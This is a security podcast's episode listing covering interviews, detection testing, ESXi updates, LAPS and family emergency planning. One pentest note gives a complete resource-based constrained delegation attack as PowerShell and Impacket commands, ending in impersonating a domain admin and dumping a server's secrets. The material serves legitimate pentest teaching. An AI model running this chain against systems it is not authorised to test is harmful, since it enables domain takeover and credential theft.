7 Minute Security

7 Minute Security is a weekly information security podcast focusing on penetration testing, blue teaming and building a career in security. The podcast also features in-depth interviews with industry leaders who share their insights, tools, tips and tricks for being a successful security engineer.
Episodes (528)

Today we're featuring a great interview with Matthew Warner, CTO and co-founder of Blumira. You might remember Matt from such podcasts as this one, when Matt gave us a fountain of info on why out-of-the-box Windows logging isn't awesome, and how to get it turned up to 11! Today, we talk about a cool report that Blumira put out called 2022 Blumira's State of Detection & Response, and dive into some interesting topics within it, including:
  • How do companies like Blumira (who we rely on to stay on top of threats) keep their teams on top of threats?
  • Why open source detections are a great starting point - but not a magic bullet.
  • Consider this "what if" - a C2 beacon lands on your prod file server in the middle of the work day. Do you take it down during a busy time to save/clean the box as much as possible? Or do you hope to be able to wait until the weekend and triage it then?
  • Why annoying traffic/alerts are still worth having a conversation about. For example, if you RDP out of your environment and into Azure, that might be fine. But what about when you see an RDP connection going out to a Digital Ocean droplet? Should you care? Well, do you use Digital Ocean for legit biz purposes?
  • Data exfiltration - where does it sit on your priority list? How hard is it to monitor/block?
  • Common lateral movement tools/techniques.
  • Why honeypots rule!

In today's episode, I try to get us thinking about our extended family's emergency/DR plan. Why? Because I recently had a close family member suffer a health scare, and it brought to light some questions we didn't have all the answers for:
  • Do we have creds to log onto his computer? How about his email accounts?
  • Do we have usernames/passwords for retirement accounts, bank accounts, etc.?
  • For vehicles/ATVs/boats/etc. - do we have documentation about their service records? How about titles?
  • Can we get into his phone to get key info off of text messages and grab phone #s of key contacts?
  • What are his wishes if he were to pass? Do not resuscitate? How is the money getting handled? Cremation vs. burial?
  • Do we have redundancy in this plan, or is it all on paper in a file somewhere?

In today's episode we talk about Purple Knight, a free tool to help assess your organization's Active Directory security. I stuck Purple Knight in our Light Pentest LITE pentest training lab and did an informal compare-and-contrast of its detection capabilities versus PingCastle, which we talked about in depth in episode #489.

Today's another fun tale of pentest pwnage - specifically focused on cracking a hash type I'd never paid much attention to before: cached domain credentials. I also learned that you can at least partially protect against this type of hash being captured by checking out this article, which has you set the following setting in GPO: under Computer Configuration > Policies > Windows Settings > Security Settings > Local Policies > Security Options, set Interactive logon: Number of previous logons to cache to 0. Be careful, as you will have login problems if a domain controller is not immediately accessible! In regards to defending against secretsdump, I found this article to be super interesting.

Today we're sharing an update to episode #512, where we ran Rapid7's InsightIDR through a bunch of attacks:
  • Active Directory enumeration via SharpHound
  • Password spraying through Rubeus
  • Kerberoasting and ASREPRoasting via Rubeus
  • Network protocol poisoning with Inveigh. Looking for a free way to detect protocol poisoning? Check out CanaryPi.
  • Hash dumping using Impacket. I also talk about an interesting Twitter thread that discusses the detection of hash dumping.
  • Pass-the-hash attacks with CrackMapExec
In today's episode I share some emails and conversations we had with Rapid7 about these tests and their results. I'm also thrilled to share with you the articles themselves: Getting Started with Rapid7 InsightIDR: A SIEM Tutorial, and Testing & Evaluating SIEM Systems: A Review of Rapid7 InsightIDR.

I'm extra psyched today, because today's episode (which is all about updating your VMware ESXi version via command line) is complemented by video: https://www.youtube.com/watch?v=0-XAO32LEPY
Shortly after recording this video, I found this awesome article which walks you through a different way to tackle these updates:
List all upgrade profiles:
esxcli software sources profile list --depot=https://hostupdate.vmware.com/software/VUM/PRODUCTION/main/vmw-depot-index.xml
Grep for just the ones you want (in my case ESXi 7.x):
esxcli software sources profile list --depot=https://hostupdate.vmware.com/software/VUM/PRODUCTION/main/vmw-depot-index.xml | grep -i ESXi-7.0
Apply the one you want (substitute the profile name you picked from the list above for the placeholder):
esxcli software profile update -p <PROFILE-NAME-FROM-LIST> -d https://hostupdate.vmware.com/software/VUM/PRODUCTION/main/vmw-depot-index.xml

Well friends, it has been a while since we talked about Microsoft's awesome Local Administrator Password Solution - specifically, the last time was way back in 2017! Lately I've been training some companies on how to install it by giving them a live walkthrough in our Light Pentest LITE lab, so I thought it would be a good time to write up a refreshed, down and dirty install guide. Here we go! (See the show notes for today's episode for more details!)

Hey friends, a while back in episode #505 we talked about pwning wifi PSKs and PMKIDs with Bettercap. Today I'm revisiting that with even some more fun command line kung fu to help you zero in on just the networks you're interested in and filter out a bunch of noisy events from bettercap in the process.

Hey friends! Today's another swell tale of pentest pwnage, and it's probably my favorite one yet (again)! This tale involves resource based constrained delegation, which is just jolly good evil fun! Here are my quick notes for pwning things using RBCD:

# From non-domain joined machine, get a cmd.exe running in the context of a user with ownership rights over a victim system:
runas /netonly /user:domain\some.user cmd.exe

# Make new machine account:
New-MachineAccount -MachineAccount EVIL7MS -Password $(ConvertTo-SecureString 'Muah-hah-hah!' -AsPlainText -Force) -Verbose

# Get the SID:
$ComputerSid = Get-DomainComputer -Identity EVIL7MS -Properties objectsid | Select -Expand objectsid

# Create raw descriptor for fake computer principal:
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)

# Apply descriptor to victim machine:
Get-DomainComputer SERVER-I-WANT-2-PWN | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose

# Get a service ticket for the EVIL7MS box and impersonate a domain admin ("badmin") on the SERVER-I-WANT-2-PWN box:
getST.py -spn cifs/SERVER-I-WANT-2-PWN -impersonate badmin -dc-ip 1.2.3.4 domain.com/EVIL7MS$:Muah-hah-hah!

# Set the ticket:
export KRB5CCNAME=badmin.ccache

# Dump victim server's secrets!
secretsdump.py -debug -k SERVER-I-WANT-2-PWN

Also, on the relaying front, I found this blog from TrustedSec as well as this article from LummelSec to be amazing resources. Looking for an affordable resource to help you in your pentesting efforts? Check out our Light Pentest LITE: ebook Edition!

Hey friends, today we're giving another peek behind the curtain of what it's like to run a cybersecurity consultancy. Topics include:
  • Setting the right communication cadence - and communication channels - with a customer during a pentest.
  • Tips for collaborating well with contractors so that the customer experience feels like "a single human pane of glass" (insert barf emoji here).
  • How we're using Intercom to publish self-help/FAQ articles for 7MS.
